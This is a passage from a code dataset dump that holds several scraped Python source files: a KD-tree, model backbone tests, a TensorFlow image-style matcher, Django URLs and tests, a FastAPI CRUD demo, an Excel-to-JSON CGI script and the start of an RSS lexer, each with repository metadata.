"sklearn.model_selection.ShuffleSplit", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.model_selection.ShuffleSplit", "line_number": 42, "usage_type": "call"}, {"api_name": "photonai.PipelineElement", "line_number": 50, "usage_type": "call"}, {"api_name": "photonai.PipelineElement", "line_number": 52, "usage_type": "call"}, {"api_name": "photonai.FloatRange", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "10851612170", "text": "from typing import List, Tuple, Callable, Optional\nimport numpy as np\nfrom dataclasses import dataclass, field\nimport heapq\n\n\n@dataclass\nclass _Node:\n point: np.ndarray # D-dimensional point\n idx: int\n axis: int\n left: \"Optional[_Node]\"\n right: \"Optional[_Node]\"\n\n\n@dataclass(order=True)\nclass _Candidate:\n dist: float\n idx: int = field(compare=False)\n\n\ndef _priority_push(container: List[_Candidate], element: _Candidate, max_size: int) -> None:\n element.dist *= -1 # hack for heapq to reverse order\n if len(container) >= max_size:\n heapq.heappushpop(container, element)\n else:\n heapq.heappush(container, element)\n\n\ndef _get_best_dist(container: List[_Candidate]) -> _Candidate:\n return -heapq.nlargest(1, container)[0].dist\n\n\ndef _get_sorted(container: List[_Candidate]) -> List[_Candidate]:\n return sorted(container, reverse=True)\n\n\ndef dist_l2(point_a: np.ndarray, point_b: np.ndarray) -> float:\n return np.sum((point_a-point_b) ** 2) ** 0.5\n\n\nclass KDTree:\n def __init__(self, data: np.ndarray, dist: Optional[Callable] = None):\n \"\"\"KDTree for fast generalized N-point problems\n\n Args:\n data (array-like of shape (n_samples, n_features)): [description]\n \"\"\"\n super().__init__()\n self.dist = dist\n if self.dist is None:\n self.dist = dist_l2\n self.dim: int = data.shape[1]\n indexes = np.arange(len(data))\n self.__tree: Optional[_Node] = self.__build_tree(data, indexes)\n\n def __build_tree(self, data: np.ndarray, indexes: np.ndarray, axis: int = 0) -> Optional[_Node]:\n if len(data) == 
0:\n return None\n sorter = data[:, axis].argsort() # sort data over the split-axis\n data = data[sorter]\n indexes = indexes[sorter]\n # print('sort by ', axis)\n # print(data)\n middle_idx = data.shape[0] // 2\n middle = data[middle_idx]\n while (middle_idx+1) < data.shape[0] and data[middle_idx+1, axis] == middle[axis]:\n middle_idx += 1\n next_axis = (axis + 1) % data.shape[1]\n # print(middle, axis)\n return _Node(\n point=middle,\n idx=indexes[middle_idx],\n axis=axis,\n left=self.__build_tree(data[:middle_idx], indexes[:middle_idx], axis=next_axis),\n right=self.__build_tree(data[middle_idx+1:], indexes[middle_idx+1:], axis=next_axis)\n )\n\n def __nearest(self, storage: List[_Candidate], root: _Node, point: np.ndarray, axis: int, n: int):\n if root is None:\n return\n dist = self.dist(root.point, point)\n print(point, root.point, root.idx, dist)\n\n _priority_push(storage, _Candidate(idx=root.idx, dist=dist), max_size=n)\n\n if dist <= 0.000001: # why this magic number?\n return\n dx = root.point[axis] - point[axis]\n next_axis = (axis + 1) % point.shape[0]\n\n self.__nearest(storage, root.right if dx < 0 else root.left, point, next_axis, n)\n best_dist = _get_best_dist(storage)\n if dx**2 >= best_dist: # what is that?\n return\n self.__nearest(storage, root.left if dx < 0 else root.right, point, next_axis, n)\n\n def query(self, points: np.ndarray, n: int) -> Tuple[List[float], List[int]]:\n \"\"\"query the tree for the k nearest neighbors\n\n Args:\n points (array-like of shape (n_samples, n_features)): An array of points to query\n n (int): The number of nearest neighbours to return\n\n Returns:\n Tuple[List[float], List[int]]: list of (distances, indices) to the neighbors of the corresponding point.\n \"\"\"\n storage: List[_Candidate] = []\n self.__nearest(storage, self.__tree, points, axis=0, n=n)\n storage = _get_sorted(storage)\n print(storage)\n return [el.dist for el in storage], [el.idx for el in storage]\n\n def query_range(self):\n \"\"\"query all points inside the rectangle\n \"\"\"\n pass\n", "repo_name": "senior-sigan/data-structures-training", "sub_path": "k-d-tree/kd_tree.py", "file_name": "kd_tree.py", "file_ext": "py", "file_size_in_byte": 4018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.ndarray", "line_number": 9, "usage_type": "attribute"}, {"api_name": "dataclasses.dataclass", "line_number": 7, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 19, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 16, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "heapq.heappushpop", "line_number": 25, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 27, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 30, "usage_type": "name"}, {"api_name": "heapq.nlargest", "line_number": 31, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 43, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "typing.Optional", 
"line_number": 55, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 57, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 79, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 98, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 108, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 98, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 98, "usage_type": "name"}]} +{"seq_id": "40489472649", "text": "import torch\n\nfrom mmpose.models.backbones import I3D\n\n\ndef test_i3d_backbone():\n \"\"\"Test I3D backbone.\"\"\"\n model = I3D()\n model.train()\n\n vids = torch.randn(1, 3, 16, 112, 112)\n feat = model(vids)\n assert feat.shape == (1, 1024, 2, 3, 3)\n\n model = I3D(expansion=0.5)\n model.train()\n\n vids = torch.randn(1, 3, 32, 224, 224)\n feat = model(vids)\n assert feat.shape == (1, 512, 4, 7, 7)\n", "repo_name": "aim-uofa/Poseur", "sub_path": "tests/test_backbones/test_i3d.py", "file_name": "test_i3d.py", "file_ext": "py", "file_size_in_byte": 417, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 158, "dataset": "github-code", "pt": "61", "api": [{"api_name": "mmpose.models.backbones.I3D", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 11, "usage_type": "call"}, {"api_name": "mmpose.models.backbones.I3D", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "41761979837", "text": "import os\nimport pathlib\n\nimport tensorflow as tf\nimport matplotlib as mpl\nimport pandas as pd\nimport logging\n\n# Load compressed models from tensorflow_hub\nos.environ['TFHUB_MODEL_LOAD_FORMAT'] = 'COMPRESSED'\nmpl.rcParams['figure.figsize'] = (12, 12)\nmpl.rcParams['axes.grid'] = False\n\nIMAGE_SIZE = 500\nlocal_path = pathlib.Path().resolve()\nstyles_path = local_path / 'styles'\nimage_classes_path = local_path / 'styles_classes'\n\n\ndef load_img(path_to_img):\n logging.info(f'Trying to load file {path_to_img}')\n img = tf.io.read_file(path_to_img)\n img = tf.image.decode_image(img, channels=3)\n img = tf.image.convert_image_dtype(img, tf.float32)\n shape = tf.cast(tf.shape(img)[:-1], tf.float32)\n long_dim = max(shape)\n scale = IMAGE_SIZE / long_dim\n new_shape = tf.cast(shape * scale, tf.int32)\n img = tf.image.resize(img, new_shape)\n img = img[tf.newaxis, :]\n img = img * 255\n return img\n\n\ndef find_images(path):\n images = pd.DataFrame()\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".jpg\"):\n path = os.path.join(file)\n path = pd.Series(data=path)\n images = images.append(path, ignore_index=True)\n logging.info(f'Find a file {path}')\n images.rename(columns={0: 'filename'}, inplace=True)\n logging.info(f'Find {len(images.index)} images')\n return images\n\n\ndef get_image_classes(images):\n df = pd.DataFrame()\n vgg = tf.keras.applications.VGG19(include_top=True, weights='imagenet')\n for index, row in images.iterrows():\n path = styles_path + images[\"filename\"][index]\n image = load_img(path)\n x = tf.keras.applications.vgg19.preprocess_input(image)\n x = tf.image.resize(x, (224, 224))\n prediction_probabilities = vgg(x)\n predicted_top_5 = pd.DataFrame(\n tf.keras.applications.vgg19.decode_predictions(prediction_probabilities.numpy())[0],\n columns=[\"id\", 
\"name\", \"probability\"])\n for ind, rw in predicted_top_5.iterrows():\n frame = [images[\"filename\"][index], predicted_top_5[\"id\"][ind], predicted_top_5[\"name\"][ind],\n predicted_top_5[\"probability\"][ind]]\n df2 = pd.DataFrame([frame], columns=[\"filename\", \"id\", \"name\", \"probability\"])\n df = df.append(df2, ignore_index=True)\n x = None\n logging.info(f'Return {len(df.index)} classes for images')\n return df\n\n\ndef match_style_image(image):\n logging.info(f'Looking for the best style image for {image}')\n image = load_img(image)\n vgg = tf.keras.applications.VGG19(include_top=True, weights='imagenet')\n x = tf.keras.applications.vgg19.preprocess_input(image)\n x = tf.image.resize(x, (224, 224))\n prediction_probabilities = vgg(x)\n predicted_top_5 = pd.DataFrame(\n tf.keras.applications.vgg19.decode_predictions(prediction_probabilities.numpy())[0],\n columns=[\"id\", \"name\", \"probability\"])\n path = image_classes_path / 'local_images_classes.csv'\n styles = pd.read_csv(str(path))\n styles = styles.merge(predicted_top_5, how='left', on='id',\n suffixes=('_left', '_right'))\n styles.sort_values(by=['probability_right', 'probability_left'], ascending=False, inplace=True)\n styles = styles.reset_index(drop=True)\n filename = styles['filename'][0]\n logging.info(f'Matched image {filename}')\n return filename\n\n\n\nif __name__ == '__main__':\n local_images = find_images(styles_path)\n local_images_classes = get_image_classes(local_images)\n path = image_classes_path / 'local_images_classes.csv'\n local_images_classes.to_csv(str(path))", "repo_name": "Fly-dream/telegram_bot_with_CV", "sub_path": "telegram_bot/image_processing/style_images_processing.py", "file_name": "style_images_processing.py", "file_ext": "py", "file_size_in_byte": 3701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 11, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.io.read_file", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.image.decode_image", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.image.convert_image_dtype", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.image.resize", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.newaxis", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 36, 
"usage_type": "call"}, {"api_name": "os.walk", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 43, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.keras.applications.VGG19", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.applications.vgg19.preprocess_input", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.image.resize", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.keras.applications.vgg19.decode_predictions", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 64, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 67, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.keras.applications.VGG19", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.applications.vgg19.preprocess_input", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tensorflow.image.resize", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.keras.applications.vgg19.decode_predictions", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 82, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "7149878959", "text": "from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom .views import (landing, home, logout, listagem_fabricante as list, novo_fabricante as novo, deletar_fabricante as delete,\n cadastra_cidade, cadastra_estado, cadastra_contato, atualiza_fabricante, remove_contato,\n lista_material as list_m, lista_material_a as list_a, cadastra_material,\n cadastra_tipo_de_material as cad_tipo_mat, altera_material, entrada_de_material,\n deleta_material)\n\nurlpatterns = [\n path('', landing, name='landing'),\n path('home/', home, name='home'),\n path('logout/', logout, name='logout'),\n path('fabricantes/', list, name='list_fabricantes'),\n path('fabricantes/novo/', novo, name='novo_fabricante'),\n path('fabricantes/remover/', delete, name='delete'),\n path('fabricantes/atualizar/', atualiza_fabricante, name='atualiza_fabricante'),\n path('fabricantes/contatos/', cadastra_contato, name='contato'),\n path('fabricantes/contatos/deletar/', remove_contato, name='remover_contato'),\n 
path('cidades/nova/', cadastra_cidade, name='nova_cidade'),\n path('estados/novo/', cadastra_estado, name='novo_estado'),\n path('materiais/', list_m, name='lista_material'),\n path('materiais/ordenada/', list_a, name='lista_m_alfa'),\n path('materiais/novo', cadastra_material, name='novo_material'),\n path('materiais/alterar/', altera_material, name='altera_material'),\n path('material/deletar/', deleta_material, name='deleta_material'),\n path('materiais/tipo/novo', cad_tipo_mat, name='novo_tipo_material'),\n path('materiais/entrada/', entrada_de_material, name='entrada_de_material'),\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)", "repo_name": "PauloViniciusBaleeiro/almoxarifado_FATEC_tg", "sub_path": "core/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1851, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.landing", "line_number": 11, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "views.home", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "views.logout", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "views.listagem_fabricante", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "views.novo_fabricante", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "views.deletar_fabricante", "line_number": 16, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "views.atualiza_fabricante", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "views.cadastra_contato", "line_number": 18, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "views.remove_contato", "line_number": 19, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "views.cadastra_cidade", "line_number": 20, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "views.cadastra_estado", "line_number": 21, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "views.lista_material", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "views.lista_material_a", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "views.cadastra_material", "line_number": 24, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "views.altera_material", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "views.deleta_material", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, 
{"api_name": "views.cadastra_tipo_de_material", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "views.entrada_de_material", "line_number": 28, "usage_type": "argument"}, {"api_name": "django.conf.urls.static.static", "line_number": 29, "usage_type": "call"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 29, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 29, "usage_type": "name"}, {"api_name": "django.conf.settings.STATIC_ROOT", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "21559808213", "text": "from fastapi import FastAPI, Response, status, HTTPException\n\n\nfrom fastapi.params import Body\n\n\nfrom pydantic import BaseModel\n\n\nfrom typing import Optional\n\nfrom random import randrange\n\n\n\napp = FastAPI()\n\n\nclass Post(BaseModel):\n title: str\n content: str\n\n isPublished: bool = True\n\n rating: Optional[int] = None\n\n\nmy_posts = [{\"title\": \"title of post 1\", \"content\": \"content of post 1\", \"id\": 1}, {\n\n \"title\": \"Favourite foods\", \"content\": \"I love eating pizza\", \"id\": 2}]\n\n\ndef find_post(id):\n\n for p in my_posts:\n\n if p['id'] == id:\n return p\n\n\ndef find_index_post(id: int):\n\n for i , p in enumerate(my_posts):\n\n if p['id'] == id:\n\n return id\n\n\n@app.get(\"/\")\nasync def root():\n\n return {\"message\": \"Welcome to my api\"}\n\n\n@app.get(\"/posts\")\ndef get_post():\n\n return {\"data\": my_posts}\n\n\n@app.post(\"/posts\", status_code=status.HTTP_201_CREATED)\ndef create_post(post: Post):\n\n post_dic = post.dict()\n\n post_dic['id'] = randrange(0, 100000)\n\n my_posts.append(post_dic)\n\n print(post.dict())\n\n return {\"data\": my_posts}\n\n\n@app.get(\"/post/{id}\")\ndef getpost(id: int):\n\n post = find_post(id)\n if not post:\n\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Post with id{id} was not found\")\n\n return {\"post_detail\": post}\n\n\n@app.delete(\"/delposts/{id}\", status_code=status.HTTP_204_NO_CONTENT)\ndef delete_post(id: int):\n\n index = find_index_post(id)\n if index == None :\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail= f\"post with id:{id} does not exist\")\n print(\"ss\")\n print(index)\n my_posts.pop(index)\n\n return Response(status_code= status.HTTP_204_NO_CONTENT)\n@app.put(\"/posts/{id}\")\ndef update_post(id:int ,post:Post):\n index = find_index_post(id)\n if index == None :\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail= f\"post with id:{id} does not exist\")\n post_dic = post.dict()\n post_dic['id'] = id\n my_posts[index] = post_dic\n\n return {'message':\"updated post\"}", "repo_name": "ogomegbunam/fast_api", "sub_path": "chris/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2092, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.FastAPI", "line_number": 16, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "random.randrange", "line_number": 67, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_201_CREATED", "line_number": 62, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 62, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 82, "usage_type": "call"}, {"api_name": 
"fastapi.status.HTTP_404_NOT_FOUND", "line_number": 82, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 82, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 93, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_404_NOT_FOUND", "line_number": 93, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 93, "usage_type": "name"}, {"api_name": "fastapi.Response", "line_number": 98, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_204_NO_CONTENT", "line_number": 98, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 98, "usage_type": "name"}, {"api_name": "fastapi.status.HTTP_204_NO_CONTENT", "line_number": 88, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 88, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 103, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_404_NOT_FOUND", "line_number": 103, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 103, "usage_type": "name"}]} +{"seq_id": "12754574721", "text": "from django.test import TestCase\n\n# Create your tests here.\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom .models import Snack\n\n\nclass Tests(TestCase):\n def __init__(self):\n self.snack = None\n\n def setUp(self):\n self.user = get_user_model().objects.create_user(\n username=\"tester\", email=\"tester@email.com\", password=\"pass\"\n )\n\n self.snack = Snack.objects.create(\n title=\"Snack_Test\", purchaser='jana', description = \"this test is working\",\n )\n\n def test_string_representation(self):\n self.assertEqual(str(self.snack), \"Snack_Test\")\n\n def test_snack_content(self):\n self.assertEqual(f\"{self.snack.title}\", \"Snack_Test\")\n self.assertEqual(f\"{self.snack.description}\", \"this test is working\")\n self.assertEqual(f\"{self.snack.purchaser}\", 'jana')\n\n def test_snack_list_view(self):\n response = self.client.get(reverse(\"snack_list\"))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"Snack_Test\")\n self.assertTemplateUsed(response, \"snack_list.html\")\n\n def test_snack_detail_view(self):\n response = self.client.get(reverse(\"snack_detail\", args=\"1\"))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"description: this test is working\")\n self.assertTemplateUsed(response, \"snack_detail.html\")\n\n def test_snack_create_view(self):\n response = self.client.post(\n reverse(\"snack_create\"),\n {\n \"title\": \"snack34\",\n \"purchaser\": \"drake\",\n \"description\": \"ygibuoihiuhiuyvyu\",\n }, follow=True\n )\n\n self.assertRedirects(response, reverse(\"snack_detail\", args=\"2\"))\n self.assertContains(response, \"Details about snack34\")\n\n def test_snack_update_view_redirect(self):\n response = self.client.post(\n reverse(\"snack_update\", args=\"1\"),\n {\"title\": \"Updated title\",\"purchaser\":\"josh\",\"description\":\"byhuiojo\"}\n )\n\n self.assertRedirects(response, reverse(\"snack_detail\", args=\"1\"))\n\n def test_snack_delete_view(self):\n response = self.client.get(reverse(\"snack_delete\", args=\"1\"))\n self.assertEqual(response.status_code, 200)", "repo_name": "Jana998-alt/django-crud", "sub_path": "snacks/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 2361, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": 
[{"api_name": "django.test.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Snack.objects.create", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Snack.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.Snack", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 40, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 47, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 55, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 60, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 64, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "42576977271", "text": "import xlrd\nimport random\nimport json\n\n\ndef read_excel():\n path = 'C:\\\\Users\\\\omignot\\\\Desktop\\\\names.xls'\n sheet = 'f1'\n try:\n wb1 = xlrd.open_workbook(path, encoding_override=\"gb2312\")\n wb1_sheet1 = wb1.sheet_by_name(sheet)\n \n \n experts=\"\"\"[\"\"\"\n \n \n for j in range(5, 62): \n \n expert1_nom = wb1_sheet1.cell_value(j, 1)\n expert1_prenom = wb1_sheet1.cell_value(j, 2)\n expert1_num = wb1_sheet1.cell_value(j, 3)\n expert1_lieu = wb1_sheet1.cell_value(j, 4)\n expert1_expertise = wb1_sheet1.cell_value(j, 5)\n \n field1 = \"nom\"\n field2 = \"prenom\"\n field3 = \"tel1\"\n field4 = \"type\"\n \n if j != 61:\n experts+= \"{\"\n experts+= \"\\\"nom\\\":\\\"\"+expert1_nom+\"\\\",\"\n experts+= \"\\\"prenom\\\":\\\"\"+expert1_prenom+\"\\\",\"\n experts+= \"\\\"tel1\\\":\\\"\"+expert1_num+\"\\\",\"\n experts+= \"\\\"lieu\\\":\\\"\"+expert1_lieu+\"\\\",\"\n experts+= \"\\\"type\\\":\\\"\"+expert1_expertise+\"\\\"}\"\n experts+=\",\"\n else:\n experts+= \"{\"\n experts+= \"\\\"nom\\\":\\\"\"+expert1_nom +\"\\\",\"\n experts+= \"\\\"prenom\\\":\\\"\"+expert1_prenom +\"\\\",\"\n experts+= \"\\\"tel1\\\":\\\"\"+expert1_num+\"\\\",\"\n experts+= \"\\\"lieu\\\":\\\"\"+expert1_lieu+\"\\\",\"\n experts+= \"\\\"type\\\":\\\"\"+expert1_expertise+\"\\\"}\"\n \n experts+= \"\"\"]\"\"\"\n \n print('Content-Type: application/json')\n print('')\n print(experts)\n except xlrd.biffh.XLRDError:\n print(\"Le fichier d'entrée : \\\"\" + path + \"\\\" est vide\")\n\nread_excel()", "repo_name": "OliverJugger/meli", "sub_path": "python2/cgi-bin/all.py", "file_name": "all.py", "file_ext": "py", "file_size_in_byte": 1747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "xlrd.open_workbook", "line_number": 10, "usage_type": "call"}, {"api_name": "xlrd.biffh", "line_number": 51, "usage_type": "attribute"}]} +{"seq_id": "33949636107", "text": "#importar librerias\nimport ply.lex as lex\nimport re \nimport codecs\nimport os\nimport sys\nimport pathlib\n\n\nreservadas = ['APERTURA_XML', 'VERSION_XML', 'ENCODING_VERSION', 'CIERRE_XML', 'APERTURA_RSS', 'VERSION_RSS', 'CIERRE_RSS', 'APERTURA_CHANNEL', 'CIERRE_CHANNEL', 'APERTURA_TITLE', 'CIERRE_TITLE', 'APERTURA_LINK', 'CIERRE_LINK', 'APERTURA_DESC', 'CIERRE_DESC', 'APERTURA_CAT', 'CIERRE_CAT', 'APERTURA_COPY', 'CIERRE_COPY', 'APERTURA_IMAG', 'CIERRE_IMAG', 'APERTURA_HEIGHT', 'CIERRE_HEIGHT', 'APERTURA_WIDTH', 'CIERRE_WIDTH', 'APERTURA_ITEM', 'CIERRE_ITEM', 'APERTURA_LANGUAGE', 
